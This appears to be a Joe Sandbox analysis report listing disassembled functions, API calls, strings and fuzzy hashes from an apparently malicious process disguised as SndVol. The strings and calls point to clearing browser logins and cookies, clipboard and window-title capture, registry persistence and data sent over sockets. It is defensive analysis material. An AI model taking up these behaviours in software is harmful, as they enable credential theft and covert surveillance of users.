Instruction Fuzzy Hash: 8FF017712083049BC304FBB5DC91DEFB39CAB90348F50493FB556921E2EE789949C65A

Function 00412006 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
RegCloseKey.ADVAPI32(00000000), ref: 00412054

Strings

http\shell\open\command, xrefs: 00412026

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: http\shell\open\command
API String ID: 3677997916-1487954565
Opcode ID: 0e8278834a88dd125b5a4e0272649bf262eb2ce361776dde88d9fd2e8eebaada
Instruction ID: 0e37d8025f140bc42ec1a8b72352379eb981339daaa9ecb07b48012be1c394e8
Opcode Fuzzy Hash: 0e8278834a88dd125b5a4e0272649bf262eb2ce361776dde88d9fd2e8eebaada
Instruction Fuzzy Hash: C5F0C271500218FBDB609B95DC49EDFBBBCEB84B12F1040A6BA04E2150DAB55F98C7A5

Function 00412204 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegCreateKeyW.ADVAPI32(80000001,00000000,004721E8), ref: 0041220F
RegSetValueExW.ADVAPI32(00472200,00000000,00000000,?,00000000,00000000,00472200,?,?,00000001), ref: 0041223E
RegCloseKey.ADVAPI32(?,?,?,00000001), ref: 00412249

Strings

pth_unenc, xrefs: 00412204

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: pth_unenc
API String ID: 1818849710-4028850238
Opcode ID: a2b3254e269ed075d9dc061201a3f9a1afffdab784d1a4dfdfe539f8f512937d
Instruction ID: 05e6d75f170e8ecdfe9b8062019ada1801530107581382ed9d20477649f1572c
Opcode Fuzzy Hash: a2b3254e269ed075d9dc061201a3f9a1afffdab784d1a4dfdfe539f8f512937d
Instruction Fuzzy Hash: A1F0AF71440218BBCF00DFA1ED45AEE376CEF44755F00816ABC05A61A1E63A9E14DA94

Function 0040C9CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18

Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430

__CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E

Strings

bad locale name, xrefs: 0040CA28

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: b8ecc850591a1ec77cb11eee1f92953351954c39fd186dfa0a3b440cd31c26bd
Instruction ID: 2c4ad0125759e8972babdbfe9bad97e9a7b68ba46d49635da0f31685b809246c
Opcode Fuzzy Hash: b8ecc850591a1ec77cb11eee1f92953351954c39fd186dfa0a3b440cd31c26bd
Instruction Fuzzy Hash: 6EF01232500604FAC328FBA6DC5299A77A49F14719F508D3FF545214D1FF396A18C699

Function 049215D2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,0045A35C,00000000,?,?,?,04921583,00000000,?,04921523,00000000,0046B4F8,0000000C,0492167A,00000000,00000002), ref: 049215F2
GetProcAddress.KERNEL32(00000000,0045A374), ref: 04921605
FreeLibrary.KERNEL32(00000000,?,?,?,04921583,00000000,?,04921523,00000000,0046B4F8,0000000C,0492167A,00000000,00000002), ref: 04921628

Strings

ou, xrefs: 04921628

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: ou
API String ID: 4061214504-3837949563
Opcode ID: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
Instruction ID: 6262d5a95e89d724bcb5f2bf10bf7adcf87cf441f26b501bf2a3a921759e7860
Opcode Fuzzy Hash: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
Instruction Fuzzy Hash: 24F0AF30A00218BBCB119BA0DD09BAEBFB9EB04716F5501B5F805A22A1DF74DE54CA98

Function 00412268 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C

Strings

P0F, xrefs: 0041226C, 0041228E, 0041226F

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: P0F
API String ID: 1818849710-3540264436
Opcode ID: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
Instruction ID: aa9041bc7d36289a95917c0f975a521a353b8518001b5fa9068edf17b8c75ad2
Opcode Fuzzy Hash: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
Instruction Fuzzy Hash: 05E03972600308BBDB209FA09D05FEA7B6CEF04B62F1141A5BF09A6591D2758E14A7A8

Function 00401497 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
GetProcAddress.KERNEL32(00000000), ref: 004014A8

Strings

GetLastInputInfo, xrefs: 00401497
User32.dll, xrefs: 0040149C

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetLastInputInfo$User32.dll
API String ID: 2574300362-1519888992
Opcode ID: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
Instruction ID: 9c97512ccc3e9dae7fbe55962af9901819d65f6a69b3e33b2a0b565c767961ff
Opcode Fuzzy Hash: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
Instruction Fuzzy Hash: 51B092B1980302AB8E006FB1AE0DE043AB8A604703B5102B6B00292161EAF99440CF2E

Function 00448C13 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00448C9E
__alldvrm.LIBCMT ref: 00448E9F
__alldvrm.LIBCMT ref: 00448EC1

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 45817878d7a01db81a842cb5081aca8b5ed5f57512068edda74ff65de2f7f38c
Instruction ID: 8a3f88530d83194aa24a517e4ef6e15a272d99a70002873db7a8ab856bdac54d
Opcode Fuzzy Hash: 45817878d7a01db81a842cb5081aca8b5ed5f57512068edda74ff65de2f7f38c
Instruction Fuzzy Hash: 18A12572A012869FFB21CE18C8817AEBBA1EF65314F24416FE5859B382CA3C8941C759

Function 00453DF4 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00453F23

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
Instruction ID: 9707d98a659f88f98630b1874925085f47dfd26ea07d7c57405a666b90b138a8
Opcode Fuzzy Hash: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
Instruction Fuzzy Hash: 69412C32A041006BDB21AFBA8C4666F3BA5DF453B7F10461FFC18D6293DB3C8E15466A

Function 0043FD01 Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
Instruction ID: c1abd53b49e6a7723cad7358b49d7c046164203d86e3a19123cc85c40c5f12b7
Opcode Fuzzy Hash: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
Instruction Fuzzy Hash: 93412871E00704AFD7249F79CC46B5A7BA9EB8C714F10523FF142DB681D37999498788

Function 00404CA3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00471EE8), ref: 00404D93
CreateThread.KERNEL32(00000000,00000000,?,00471E90,00000000,00000000), ref: 00404DA7
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DB2
CloseHandle.KERNEL32(?,?,00000000), ref: 00404DBB

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID:
API String ID: 3360349984-0
Opcode ID: 2c3cad1dadf47ab8c55b502a02f4425492f538b35a08a1ca8fb935e7fb0ba5a8
Instruction ID: 0d5bef4af40d9751d8a4c840d6feadb85822b330c50e1cee3accc81e25362d00
Opcode Fuzzy Hash: 2c3cad1dadf47ab8c55b502a02f4425492f538b35a08a1ca8fb935e7fb0ba5a8
Instruction Fuzzy Hash: DA4194712083016FCB11FB61CD55D6FB7EDAFD4314F400A3EB982A32E2DB7899098666

Function 0040AF4D Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 0040AF62
Sleep.KERNEL32(00001388), ref: 0040AFEA

Strings

Cleared browsers logins and cookies., xrefs: 0040B036
[Cleared browsers logins and cookies.], xrefs: 0040B025

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
API String ID: 3472027048-1236744412
Opcode ID: 8b2299d4167419da35c718df7871dbe309bc118562e90e7a0a6311305ab773bd
Instruction ID: 9e673e540e653d5dfc9c41bfd33b173fe745421aa21f598ea7623546fa890e2b
Opcode Fuzzy Hash: 8b2299d4167419da35c718df7871dbe309bc118562e90e7a0a6311305ab773bd
Instruction Fuzzy Hash: EE31A24074C3826EDA11BBB555267EF6B924A53758F0844BFF8C42B3C3D9BA4818936F

Function 00411140 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00472200), ref: 00412104
Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041211D
Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128

Sleep.KERNEL32(00000BB8), ref: 004111DF

Strings

!G, xrefs: 00411155
H"G, xrefs: 00411163
exepath, xrefs: 00411168, 004111A8, 00411229

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseOpenQuerySleepValue
String ID: H"G$exepath$!G
API String ID: 4119054056-2148977334
Opcode ID: c6b7fd93e55878c55fbeb38dd929213cc60599e209660ca03378386740ff024a
Instruction ID: cc1704131a0fe244d5c58522e2247ad29464f3afd50ace533094a5add093a815
Opcode Fuzzy Hash: c6b7fd93e55878c55fbeb38dd929213cc60599e209660ca03378386740ff024a
Instruction Fuzzy Hash: 2321F7A1B0030426DA00B7765D56AAF724D8B84308F00447FBE46F72E3DEBC9D0981AD

Function 004094FF Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 81sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E

Sleep.KERNEL32(000001F4), ref: 0040955A
Sleep.KERNEL32(00000064), ref: 004095F5

Strings

[ , xrefs: 00409576
], xrefs: 00409562

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: 50bd45538fc1325d318fbbf77384be1d7cd884a7cd54cef18345d66a056de0e4
Instruction ID: f130b1bb1348f748448b569433b56ba5176942d51498ef551544d7c0cb15bd34
Opcode Fuzzy Hash: 50bd45538fc1325d318fbbf77384be1d7cd884a7cd54cef18345d66a056de0e4
Instruction Fuzzy Hash: 2721657160420067C618B776DC179AE32A89F51308F40447FF552772D3EE7D9A05869F

Function 00440F33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
Instruction ID: cddd12244c82da27d8fba5a3cfb3b4b8374ea1530061808fe1103b2c2b1f06f2
Opcode Fuzzy Hash: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
Instruction Fuzzy Hash: 46018FB26092163EF6302E796CC1F67271CDF517B9B21033BF625622D2EAB8CD254568

Function 00440FB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a806abc81d082e1cec901e4614177c074956c5300ea34d23f617e0004ee84c8
Instruction ID: ded37596ea74bb71ca552df42b40a6491f306b500b676c7390fdbb9d5d89f826
Opcode Fuzzy Hash: 0a806abc81d082e1cec901e4614177c074956c5300ea34d23f617e0004ee84c8
Instruction Fuzzy Hash: E801D1B220A2163EB6202E796CC9D27631DEF513BE725033BF521522E6EF7DCC855168

Function 00445A95 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
GetLastError.KERNEL32(?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
Instruction ID: dabcc1aa4f00c9d7d6140ee010913d89a9079070269616da1364236c98588597
Opcode Fuzzy Hash: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
Instruction Fuzzy Hash: 8501FC32601B276BDF218A78AC84D577758EF05B617110635F906E3242D724DC01C6E8

Function 0041A20F Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
GetFileSize.KERNEL32(00000000,00000000), ref: 0041A23C
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041A261
CloseHandle.KERNEL32(00000000), ref: 0041A26F

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: 41f32d273eec2ecedf938006867b0e525744eccbc76a9f2796ec39ced93a6363
Instruction ID: 89bb00dd3d40589ea0a8ab1c68f17f151e0eed20b013a8aeca2898ab58bcd068
Opcode Fuzzy Hash: 41f32d273eec2ecedf938006867b0e525744eccbc76a9f2796ec39ced93a6363
Instruction Fuzzy Hash: 6EF0F6B13023087FE6102B21AC84FBF369CDB867A5F01027EF901A32C1CA3A8C054536

Function 00436CD1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00436CD1
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00436CD6
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00436CDB

Part of subcall function 004381DA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004381EB

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00436CF0

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction ID: fe0629a2579d5eb29aad24ff52ac89f8c4d28ee3f0e2161d733d9faf058f7893
Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction Fuzzy Hash: 12C00254040342742C5077B622062AEA350A8AE38DFA7B4CFB892171038D0D440B953F

Function 0044015D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 004401ED

Strings

pow, xrefs: 004401C5, 004401E2

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
Instruction ID: 9a83a7e01686381b8a8ce0b853cf5bc52d75b03c70b61edc7fb1f4b11142e615
Opcode Fuzzy Hash: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
Instruction Fuzzy Hash: 21518A60A842018AFB117714CA4137B3B90EB40701F248DABE5D2563EAEB7D8CB5DA4F

Function 048F3496 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 048F34CF

Part of subcall function 048F31DE: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 048F3245
Part of subcall function 048F31DE: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 048F3274

Part of subcall function 048E5819: send.WS2_32(?,00000000,00000000,00000000), ref: 048E58AE

RegCloseKey.ADVAPI32(00000000,00463050,00463050,00469654,00469654,00000071), ref: 048F363D

Strings

P0F, xrefs: 048F361E

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseEnumInfoOpenQuerysend
String ID: P0F
API String ID: 3114080316-3540264436
Opcode ID: 7235545e6e6830560f04f6a3d8adc92ff1a8d56aa726a5aa1cc8bc0bd4d16cb4
Instruction ID: d6ff4f7de52c335a04c06bf0ef18c56cc0c90ee86fa6dfaedb993fc6f40788c2
Opcode Fuzzy Hash: 7235545e6e6830560f04f6a3d8adc92ff1a8d56aa726a5aa1cc8bc0bd4d16cb4
Instruction Fuzzy Hash: AC41E53065434497E324F72EDD50AFF77989F96208F408E2EA54AD31D0EEE4BD4A8267

Function 0040402C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046

Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,756F3530,00000000,?,?,?,?,00469654,0040BDCB,.vbs,?,?,?,?,?,00472200), ref: 00419980

Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5

Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228

Sleep.KERNEL32(000000FA,00462E24), ref: 00404118

Strings

/sort "Visit Time" /stext ", xrefs: 00404092

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "
API String ID: 368326130-1573945896
Opcode ID: 07bbdaf59ea10fd4bf408577d5838142486f191c82bc25cb54ffd13a7687c691
Instruction ID: 7f8942f24ccac46b0034012f494d3192eca769648d2eef92b07e1d28e9d76a7f
Opcode Fuzzy Hash: 07bbdaf59ea10fd4bf408577d5838142486f191c82bc25cb54ffd13a7687c691
Instruction Fuzzy Hash: B5316431A0021556CB14FBB6DC969EE73B9AF90308F40017FF506B71E2EE38594ACA99

Function 0040A694 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B

__Init_thread_footer.LIBCMT ref: 0040A6E3

Strings

[Text copied to clipboard], xrefs: 0040A732
[End of clipboard], xrefs: 0040A725

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: [End of clipboard]$[Text copied to clipboard]
API String ID: 1881088180-3686566968
Opcode ID: 7103c85559471987959954c794bf5a9939257c7fe470f67ca2388a99a2e131d5
Instruction ID: 89f5e7c07999504d217297f9a041c68b3e0b8c5632e5b70e4a6c966e9d45e494
Opcode Fuzzy Hash: 7103c85559471987959954c794bf5a9939257c7fe470f67ca2388a99a2e131d5
Instruction Fuzzy Hash: 42218D31A002055ACB04FBA5D892DEDB378AF54308F10453FF506771D2EF38AE4A8A8D

Function 0044ED17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0044EF72,?,00000050,?,?,?,?,?), ref: 0044EDF2

Strings

ACP, xrefs: 0044ED35
OCP, xrefs: 0044ED6B

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
Instruction ID: ce4b6ecbf16ce97eee8671cf775368e41a8ae942868fb71505acbacd33d5bec2
Opcode Fuzzy Hash: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
Instruction Fuzzy Hash: 4F21F1E2E00102A2FB348B67CC01BAB72A6FF54B51F568426E90AD7300EB3ADD41C35C

Function 00415B11 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON

Download Yara Rule

APIs

GetWindowTextW.USER32(?,?,0000012C), ref: 00415B2E
IsWindowVisible.USER32(?), ref: 00415B37

Strings

(%G, xrefs: 00415BDC

Memory Dump Source

Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Window$TextVisible
String ID: (%G
API String ID: 1670992164-3377777310
Opcode ID: c4f1a057548f617f97dac145fe627f2fcfef0d293da89b6e65bebe14462c6ac3
Instruction ID: 7bdbcb6602ffb42e5ce2137d58ff1a132c15f169860b2e192372582f8912ca7a
Opcode Fuzzy Hash: c4f1a057548f617f97dac145fe627f2fcfef0d293da89b6e65bebe14462c6ac3
Instruction Fuzzy Hash: E42166315182019BC314FB61D891EEFB7E9AF94304F50493FF49A920E2FF349A49CA5A

Function 0491B58C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 0491B654

Strings

@F, xrefs: 0491B60A
@F, xrefs: 0491B603

Memory Dump Source

Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd

Yara matches

Similarity

API ID: CallFilterFunc@8
String ID: @F$@F
API String ID: 4062629308-3436687868
Opcode ID: 5427aaeeb1dd16046c7ffdb0152beac211c34e67c25787d2885becd2e811340c
Instruction ID: 143ee5c49203e5f5c049f708da04aefeaff993278d6ffaabb295dc2e5ee8946a
Opcode Fuzzy Hash: 5427aaeeb1dd16046c7ffdb0152beac211c34e67c25787d2885becd2e811340c
Instruction Fuzzy Hash: 27216B71F1021C86EB186B789D0076D33979F95378F184379E8269B2F0E774B5428746

Function 00404FD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
